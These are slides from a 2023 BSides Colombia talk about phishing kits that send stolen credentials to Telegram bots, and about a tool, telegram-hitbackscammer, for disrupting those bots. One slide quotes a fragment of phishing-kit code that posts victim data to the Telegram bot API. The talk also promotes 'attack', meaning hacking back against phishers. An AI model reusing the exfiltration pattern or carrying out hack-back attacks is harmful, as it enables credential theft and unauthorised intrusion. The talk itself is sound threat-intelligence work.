Talk provided in the BSides Colombia 2023 - April 2023
Video: https://www.youtube.com/watch?v=YTz1yQGyFLw
Project:
https://github.com/avechuch0/telegram-hitbackscammer
2. 03 Final product of this research
as response to mitigate these issues
Title Here
Contents
01 The use of Telegram as part of
the current threat landscape
02 How this research started
3. About me
Just a guy with the goal of overcoming himself
Threat Intel, Digital Forensics, Malware Analysis,
CloudSec, Pentesting… These little things…
GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001
University Teacher – Researcher – Speaker
Lover of nature, Musician
IBMer, X-Force Incident Response
”
6. 1. Weaponization 2. Delivery 3. Impact and
monetization
POST REQUEST
…
var settings = {
"async": true,
"crossDomain": true,
"url":
"https://api.telegram.org/bot"
+ telegram_bot_id +
"/sendMessage",
"method": "POST",
…
Attacker gets a
Telegram bot using
the Botfather for
malicious purposes
Victims
fill data
managed by
malicious
bot
Credentials
stolen for
money
transfer/
withdraw
Phishing/Smishing
So, what the fuss?
8. A set of protocols to screw up the
malicious activities of phishers
who store the victim's stolen data
on Telegram chats/channels
”
Attribution
Annoyance
Attack
So, what is
Telegram-hitbackscammer
9. Cybersec theories behind
Telegram-hitbackscammer
Triple A
of Active
Defense
Researchers
Threat hunters
Incident Responders
Developers
Attribution: Trying to unmask
the attackers
Annoyance: Wasting an
attacker’s time
Attack: It is hacking
…back using pentest
tricks
10. D.E.M.O ?
Is there a Demo… Nope is not?
https://github.com/avechuch0/telegram-hitbackscammer
Of course, it is
just kidding ☺
11. Closing thoughts
Charity / Crowdfunding / Sponsorship
The Telegram malicious current ecosystem is very
huge to process!
”
12. Closing thoughts
Be sure to hack… for good ALWAYS
Spread the word, take it, and use it
https://github.com/avechuch0/telegram-hitbackscammer
QUESTIONS?
@avechuch0
”
Jaime Andrés Bello Vieda